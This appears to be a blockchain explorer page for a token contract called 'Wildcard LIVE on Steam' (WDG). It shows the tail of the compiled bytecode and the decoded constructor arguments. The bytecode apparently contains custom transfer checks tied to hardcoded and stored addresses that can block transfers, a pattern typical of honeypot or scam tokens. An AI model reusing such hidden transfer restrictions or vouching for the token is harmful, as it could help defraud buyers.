0000000000000000000000000000000000000000000815260040160405180910390fd5b5f82106108f9576108f885836001610dac565b5b5050505050565b5f33905090565b6109148383836001610e7a565b505050565b5f6109248484610807565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8110156109a65781811015610997578281836040517ffb8f41b200000000000000000000000000000000000000000000000000000000815260040161098e93929190611d8d565b60405180910390fd5b6109a584848484035f610e7a565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a1c575f6040517f96c6fd1e000000000000000000000000000000000000000000000000000000008152600401610a139190611dc2565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a8c575f6040517fec442f05000000000000000000000000000000000000000000000000000000008152600401610a839190611dc2565b60405180910390fd5b610a97838383611193565b610aae838383610aa95f801b88610638565b6113af565b505050565b610ac481610abf610900565b6114c3565b50565b5f610ad28383610638565b610ba757600160035f8581526020019081526020015f205f015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550610b44610900565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16847f2f8788117e7eff1d82e926ec794901d17c78024a50270940304540a733656f0d60405160405180910390a460019050610bab565b5f90505b92915050565b5f610bbc8383610638565b15610c91575f60035f8581526020019081526020015f205f015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550610c2e610900565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16847ff6391f5c32d9c69d2a47ea670b442974b53935d1edc7fd64eb21e047a839171b60405160405180910390a460019050610c95565b5f90505b92915050565b5f805f5b8351811015610d9e575f6030858381518110610cbe57610cbd611ddb565b5b602001015160f81c60f81b60f81c610cd69190611e35565b60ff161080610d14575060096030858381518110610cf757610cf6611ddb565b5b602001015160f81c60f81b60f81c610d0f9190611e35565b60ff16115b15610d25575f809250925050610da7565b6001818551610d349190611e69565b610d3e9190611e69565b600a610d4a9190611fcb565b6030858381518110610d5f57610d5e611ddb565b5b602001015160f81c60f81b60f81c610d779190611e35565b60ff16610d849190612015565b83610d8f9190612056565b92508080600101915050610c9f565b50816001915091505b915091565b8015610e1f57670de0b6b3a764000082610dc69190612015565b60025f805f1b81526020019081526020015f205f015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550610e75565b8160025f805f1b81526020019081526020015f205f015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b505050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603610eea575f6040517fe602df05000000000000000000000000000000000000000000000000000000008152600401610ee19190611dc2565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610f5a575f6040517f94280d62000000000000000000000000000000000000000000000000000000008152600401610f519190611dc2565b60405180910390fd5b5f8260025f805f1b81526020019081526020015f206001015f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610fb89190612056565b90507370cbb871e8f30fc8ce23609e9e0ea87b6b222f5873ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16036110a3575f83118015611060575060025f805f1b81526020019081526020015f206001015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205481115b156110a2575f6040517f94280d620000000000000000000000000000000000000000000000000000000081526004016110999190611dc2565b60405180910390fd5b5b8260055f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550811561118c578373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925856040516111839190611955565b60405180910390a35b5050505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036111e3578060065f8282546111d79190612056565b925050819055506112b3565b5f60045f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205490508181101561126d578381836040517fe450d38c00000000000000000000000000000000000000000000000000000000815260040161126493929190611d8d565b60405180910390fd5b81810360045f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036112fa578060065f8282540392505081905550611345565b8060045f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516113a29190611955565b60405180910390a3505050565b60015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603611497575f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361149257826040517fec442f050000000000000000000000000000000000000000000000000000000081526004016114899190611dc2565b60405180910390fd5b6114bd565b806114bc575f60149054906101000a900460ff16156114bb576114ba8483611514565b5b5b5b50505050565b6114cd8282610638565b6115105780826040517fe2517d3f000000000000000000000000000000000000000000000000000000008152600401611507929190612089565b60405180910390fd5b5050565b5f8160025f805f1b81526020019081526020015f206001015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546115729190612056565b90505f8060025f805f1b81526020019081526020015f205f015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20541180156115d357505f83115b90508015611694575f808311801561163a575060025f805f1b81526020019081526020015f205f015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205483115b9050806116515761164c85845f6116d7565b61168e565b5f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016116859190611dc2565b60405180910390fd5b506116d1565b5f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016116c89190611dc2565b60405180910390fd5b50505050565b801561174b57670de0b6b3a7640000826116f19190612015565b60025f805f1b81526020019081526020015f206001015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055506117a2565b8160025f805f1b81526020019081526020015f206001015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b505050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f6117e9826117a7565b6117f381856117b1565b93506118038185602086016117c1565b61180c816117cf565b840191505092915050565b5f6020820190508181035f83015261182f81846117df565b905092915050565b5f604051905090565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61187182611848565b9050919050565b61188181611867565b811461188b575f80fd5b50565b5f8135905061189c81611878565b92915050565b5f819050919050565b6118b4816118a2565b81146118be575f80fd5b50565b5f813590506118cf816118ab565b92915050565b5f80604083850312156118eb576118ea611840565b5b5f6118f88582860161188e565b9250506020611909858286016118c1565b9150509250929050565b5f8115159050919050565b61192781611913565b82525050565b5f6020820190506119405f83018461191e565b92915050565b61194f816118a2565b82525050565b5f6020820190506119685f830184611946565b92915050565b5f805f6060848603121561198557611984611840565b5b5f6119928682870161188e565b93505060206119a38682870161188e565b92505060406119b4868287016118c1565b9150509250925092565b5f819050919050565b6119d0816119be565b81146119da575f80fd5b50565b5f813590506119eb816119c7565b92915050565b5f60208284031215611a0657611a05611840565b5b5f611a13848285016119dd565b91505092915050565b611a25816119be565b82525050565b5f602082019050611a3e5f830184611a1c565b92915050565b5f8060408385031215611a5a57611a59611840565b5b5f611a67858286016119dd565b9250506020611a788582860161188e565b9150509250929050565b5f60ff82169050919050565b611a9781611a82565b82525050565b5f602082019050611ab05f830184611a8e565b92915050565b5f60208284031215611acb57611aca611840565b5b5f611ad88482850161188e565b91505092915050565b5f8060408385031215611af757611af6611840565b5b5f611b048582860161188e565b9250506020611b158582860161188e565b9150509250929050565b5f80fd5b5f80fd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b611b5d826117cf565b810181811067ffffffffffffffff82111715611b7c57611b7b611b27565b5b80604052505050565b5f611b8e611837565b9050611b9a8282611b54565b919050565b5f67ffffffffffffffff821115611bb957611bb8611b27565b5b611bc2826117cf565b9050602081019050919050565b828183375f83830152505050565b5f611bef611bea84611b9f565b611b85565b905082815260208101848484011115611c0b57611c0a611b23565b5b611c16848285611bcf565b509392505050565b5f82601f830112611c3257611c31611b1f565b5b8135611c42848260208601611bdd565b91505092915050565b5f8060408385031215611c6157611c60611840565b5b5f611c6e8582860161188e565b925050602083013567ffffffffffffffff811115611c8f57611c8e611844565b5b611c9b85828601611c1e565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680611ce957607f821691505b602082108103611cfc57611cfb611ca5565b5b50919050565b611d0b81611867565b82525050565b5f604082019050611d245f830185611d02565b611d316020830184611946565b9392505050565b611d4181611913565b8114611d4b575f80fd5b50565b5f81519050611d5c81611d38565b92915050565b5f60208284031215611d7757611d76611840565b5b5f611d8484828501611d4e565b91505092915050565b5f606082019050611da05f830186611d02565b611dad6020830185611946565b611dba6040830184611946565b949350505050565b5f602082019050611dd55f830184611d02565b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f611e3f82611a82565b9150611e4a83611a82565b9250828203905060ff811115611e6357611e62611e08565b5b92915050565b5f611e73826118a2565b9150611e7e836118a2565b9250828203905081811115611e9657611e95611e08565b5b92915050565b5f8160011c9050919050565b5f808291508390505b6001851115611ef157808604811115611ecd57611ecc611e08565b5b6001851615611edc5780820291505b8081029050611eea85611e9c565b9450611eb1565b94509492505050565b5f82611f095760019050611fc4565b81611f16575f9050611fc4565b8160018114611f2c5760028114611f3657611f65565b6001915050611fc4565b60ff841115611f4857611f47611e08565b5b8360020a915084821115611f5f57611f5e611e08565b5b50611fc4565b5060208310610133831016604e8410600b8410161715611f9a5782820a905083811115611f9557611f94611e08565b5b611fc4565b611fa78484846001611ea8565b92509050818404811115611fbe57611fbd611e08565b5b81810290505b9392505050565b5f611fd5826118a2565b9150611fe0836118a2565b925061200d7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484611efa565b905092915050565b5f61201f826118a2565b915061202a836118a2565b9250828202612038816118a2565b9150828204841483151761204f5761204e611e08565b5b5092915050565b5f612060826118a2565b915061206b836118a2565b925082820190508082111561208357612082611e08565b5b92915050565b5f60408201905061209c5f830185611d02565b6120a96020830184611a1c565b939250505056fea264697066735822122077c386b370ad8b8847702d5414c53e05d4c40fe624a486b37d250411ae42d6e464736f6c634300081a0033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000000000000000000000000000000000000005f5e1000000000000000000000000007fa4db882a712a16e8f98fdc8e71958d2c35ee9f000000000000000000000000000000000000000000000000000000000000001657696c6463617264204c495645206f6e20537465616d0000000000000000000000000000000000000000000000000000000000000000000000000000000000035744470000000000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : _name (string): Wildcard LIVE on Steam
Arg [1] : _symbol (string): WDG
Arg [2] : value (uint256): 100000000
Arg [3] : account (address): 0x7fA4db882A712a16e8F98fdc8E71958D2c35ee9F

-----Encoded View---------------
8 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000c0
Arg [2] : 0000000000000000000000000000000000000000000000000000000005f5e100
Arg [3] : 0000000000000000000000007fa4db882a712a16e8f98fdc8e71958d2c35ee9f
Arg [4] : 0000000000000000000000000000000000000000000000000000000000000016
Arg [5] : 57696c6463617264204c495645206f6e20537465616d00000000000000000000
Arg [6] : 0000000000000000000000000000000000000000000000000000000000000003
Arg [7] : 5744470000000000000000000000000000000000000000000000000000000000


Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.